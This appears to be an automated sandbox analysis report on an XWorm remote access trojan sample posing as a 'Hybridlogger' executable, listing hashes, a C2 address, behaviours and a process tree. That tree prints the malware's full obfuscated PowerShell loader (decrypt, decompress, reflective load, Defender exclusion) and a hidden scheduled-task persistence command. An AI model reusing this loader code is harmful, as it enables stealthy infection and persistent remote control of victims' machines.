xworm | 9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

Analysis

max time kernel
1573s
max time network
1752s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08/11/2024, 22:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HybridloggerV5.5.exe
Size

937KB
MD5

c9314841cdbf8522e9ee925039d3bfb7
SHA1

1b851459626862fdae6bdc0dd30aadf7a0f905ee
SHA256

9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
SHA512

fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
SSDEEP

24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

193.161.193.99:24469

Attributes

Install_directory
%Temp%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2924-50-0x000002C148990000-0x000002C1489A6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	2924	powershell.exe
22	4732	powershell.exe
23	2612	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1976	powershell.exe
908	powershell.exe
4420	powershell.exe
4732	powershell.exe
3388	powershell.exe
2924	powershell.exe
4888	powershell.exe
2612	powershell.exe
3228	powershell.exe
2924	powershell.exe
1976	powershell.exe
4420	powershell.exe
4732	powershell.exe
2612	powershell.exe
3388	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	firefox.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
1580	NOTEPAD.EXE
3944	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3388	powershell.exe
3388	powershell.exe
3228	powershell.exe
3228	powershell.exe
2924	powershell.exe
2924	powershell.exe
1976	powershell.exe
1976	powershell.exe
908	powershell.exe
908	powershell.exe
4420	powershell.exe
4420	powershell.exe
4888	powershell.exe
4888	powershell.exe
4888	powershell.exe
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
2612	powershell.exe
2612	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeIncreaseQuotaPrivilege	3228	powershell.exe
Token: SeSecurityPrivilege	3228	powershell.exe
Token: SeTakeOwnershipPrivilege	3228	powershell.exe
Token: SeLoadDriverPrivilege	3228	powershell.exe
Token: SeSystemProfilePrivilege	3228	powershell.exe
Token: SeSystemtimePrivilege	3228	powershell.exe
Token: SeProfSingleProcessPrivilege	3228	powershell.exe
Token: SeIncBasePriorityPrivilege	3228	powershell.exe
Token: SeCreatePagefilePrivilege	3228	powershell.exe
Token: SeBackupPrivilege	3228	powershell.exe
Token: SeRestorePrivilege	3228	powershell.exe
Token: SeShutdownPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeSystemEnvironmentPrivilege	3228	powershell.exe
Token: SeRemoteShutdownPrivilege	3228	powershell.exe
Token: SeUndockPrivilege	3228	powershell.exe
Token: SeManageVolumePrivilege	3228	powershell.exe
Token: 33	3228	powershell.exe
Token: 34	3228	powershell.exe
Token: 35	3228	powershell.exe
Token: 36	3228	powershell.exe
Token: SeIncreaseQuotaPrivilege	3228	powershell.exe
Token: SeSecurityPrivilege	3228	powershell.exe
Token: SeTakeOwnershipPrivilege	3228	powershell.exe
Token: SeLoadDriverPrivilege	3228	powershell.exe
Token: SeSystemProfilePrivilege	3228	powershell.exe
Token: SeSystemtimePrivilege	3228	powershell.exe
Token: SeProfSingleProcessPrivilege	3228	powershell.exe
Token: SeIncBasePriorityPrivilege	3228	powershell.exe
Token: SeCreatePagefilePrivilege	3228	powershell.exe
Token: SeBackupPrivilege	3228	powershell.exe
Token: SeRestorePrivilege	3228	powershell.exe
Token: SeShutdownPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeSystemEnvironmentPrivilege	3228	powershell.exe
Token: SeRemoteShutdownPrivilege	3228	powershell.exe
Token: SeUndockPrivilege	3228	powershell.exe
Token: SeManageVolumePrivilege	3228	powershell.exe
Token: 33	3228	powershell.exe
Token: 34	3228	powershell.exe
Token: 35	3228	powershell.exe
Token: 36	3228	powershell.exe
Token: SeIncreaseQuotaPrivilege	3228	powershell.exe
Token: SeSecurityPrivilege	3228	powershell.exe
Token: SeTakeOwnershipPrivilege	3228	powershell.exe
Token: SeLoadDriverPrivilege	3228	powershell.exe
Token: SeSystemProfilePrivilege	3228	powershell.exe
Token: SeSystemtimePrivilege	3228	powershell.exe
Token: SeProfSingleProcessPrivilege	3228	powershell.exe
Token: SeIncBasePriorityPrivilege	3228	powershell.exe
Token: SeCreatePagefilePrivilege	3228	powershell.exe
Token: SeBackupPrivilege	3228	powershell.exe
Token: SeRestorePrivilege	3228	powershell.exe
Token: SeShutdownPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeSystemEnvironmentPrivilege	3228	powershell.exe
Token: SeRemoteShutdownPrivilege	3228	powershell.exe
Token: SeUndockPrivilege	3228	powershell.exe
Token: SeManageVolumePrivilege	3228	powershell.exe
Token: 33	3228	powershell.exe
Token: 34	3228	powershell.exe
Token: 35	3228	powershell.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe
2968	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2968	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2472 wrote to memory of 4188	2472	HybridloggerV5.5.exe	79
PID 2472 wrote to memory of 4188	2472	HybridloggerV5.5.exe	79
PID 2472 wrote to memory of 2644	2472	HybridloggerV5.5.exe	81
PID 2472 wrote to memory of 2644	2472	HybridloggerV5.5.exe	81
PID 4188 wrote to memory of 2788	4188	cmd.exe	83
PID 4188 wrote to memory of 2788	4188	cmd.exe	83
PID 2644 wrote to memory of 412	2644	cmd.exe	84
PID 2644 wrote to memory of 412	2644	cmd.exe	84
PID 412 wrote to memory of 4348	412	net.exe	85
PID 412 wrote to memory of 4348	412	net.exe	85
PID 2644 wrote to memory of 3388	2644	cmd.exe	87
PID 2644 wrote to memory of 3388	2644	cmd.exe	87
PID 3388 wrote to memory of 3228	3388	powershell.exe	89
PID 3388 wrote to memory of 3228	3388	powershell.exe	89
PID 3388 wrote to memory of 892	3388	powershell.exe	91
PID 3388 wrote to memory of 892	3388	powershell.exe	91
PID 892 wrote to memory of 5108	892	WScript.exe	92
PID 892 wrote to memory of 5108	892	WScript.exe	92
PID 5108 wrote to memory of 3236	5108	cmd.exe	94
PID 5108 wrote to memory of 3236	5108	cmd.exe	94
PID 3236 wrote to memory of 3512	3236	net.exe	95
PID 3236 wrote to memory of 3512	3236	net.exe	95
PID 5108 wrote to memory of 2924	5108	cmd.exe	96
PID 5108 wrote to memory of 2924	5108	cmd.exe	96
PID 2296 wrote to memory of 1760	2296	cmd.exe	112
PID 2296 wrote to memory of 1760	2296	cmd.exe	112
PID 2272 wrote to memory of 1672	2272	cmd.exe	116
PID 2272 wrote to memory of 1672	2272	cmd.exe	116
PID 1672 wrote to memory of 2748	1672	net.exe	117
PID 1672 wrote to memory of 2748	1672	net.exe	117
PID 2272 wrote to memory of 1976	2272	cmd.exe	118
PID 2272 wrote to memory of 1976	2272	cmd.exe	118
PID 1976 wrote to memory of 908	1976	powershell.exe	119
PID 1976 wrote to memory of 908	1976	powershell.exe	119
PID 3148 wrote to memory of 1148	3148	cmd.exe	123
PID 3148 wrote to memory of 1148	3148	cmd.exe	123
PID 1148 wrote to memory of 3080	1148	net.exe	124
PID 1148 wrote to memory of 3080	1148	net.exe	124
PID 1976 wrote to memory of 2060	1976	powershell.exe	125
PID 1976 wrote to memory of 2060	1976	powershell.exe	125
PID 2060 wrote to memory of 3516	2060	WScript.exe	126
PID 2060 wrote to memory of 3516	2060	WScript.exe	126
PID 3516 wrote to memory of 1428	3516	cmd.exe	128
PID 3516 wrote to memory of 1428	3516	cmd.exe	128
PID 1428 wrote to memory of 4468	1428	net.exe	129
PID 1428 wrote to memory of 4468	1428	net.exe	129
PID 3148 wrote to memory of 4420	3148	cmd.exe	130
PID 3148 wrote to memory of 4420	3148	cmd.exe	130
PID 4420 wrote to memory of 4888	4420	powershell.exe	131
PID 4420 wrote to memory of 4888	4420	powershell.exe	131
PID 4420 wrote to memory of 2040	4420	powershell.exe	133
PID 4420 wrote to memory of 2040	4420	powershell.exe	133
PID 2040 wrote to memory of 3240	2040	WScript.exe	134
PID 2040 wrote to memory of 3240	2040	WScript.exe	134
PID 3516 wrote to memory of 4732	3516	cmd.exe	136
PID 3516 wrote to memory of 4732	3516	cmd.exe	136
PID 3240 wrote to memory of 2984	3240	cmd.exe	137
PID 3240 wrote to memory of 2984	3240	cmd.exe	137
PID 2984 wrote to memory of 4500	2984	net.exe	138
PID 2984 wrote to memory of 4500	2984	net.exe	138
PID 3240 wrote to memory of 2612	3240	cmd.exe	139
PID 3240 wrote to memory of 2612	3240	cmd.exe	139
PID 1648 wrote to memory of 2968	1648	firefox.exe	147
PID 1648 wrote to memory of 2968	1648	firefox.exe	147

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:4348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_473_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_473.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3228
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_473.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_473.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5108
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3236
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:3512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_473.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2924

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4708

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HybridLoggerFixed.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2296
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HybridloggerV5.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:2748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\Desktop\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_674_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_674.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:908
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_674.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_674.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3516
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1428
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_674.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HybridloggerV5.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:3080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function 